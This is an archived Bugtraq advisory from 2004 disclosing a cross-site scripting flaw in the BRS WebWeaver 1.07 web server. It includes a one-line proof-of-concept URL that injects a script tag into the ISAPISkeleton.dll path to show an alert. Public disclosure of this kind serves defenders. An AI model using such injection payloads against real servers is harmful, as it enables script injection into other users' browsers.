Bugtraq mailing list archives

BRS WebWeaver Webserver Cross Site Scripting Vulnerability

From: Oliver Karow <oliver.karow () gmx de>
Date: Wed, 28 Jan 2004 12:34:45 +0100

BRS WebWeaver Webserver Cross Site Scripting Vulnerability
================================================

Whatis:
=====

BRS WebWeaver is a free personal web server that runs on the Windowsplatform.


Version:
======

V 1.07

Exploiting:
=======

http://127.0.0.1/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script>

Vendor:
======

http://www.brswebweaver.com

Credit:
=====

www.oliverkarow.de

Current thread:

BRS WebWeaver Webserver Cross Site Scripting Vulnerability Oliver Karow (Jan 28)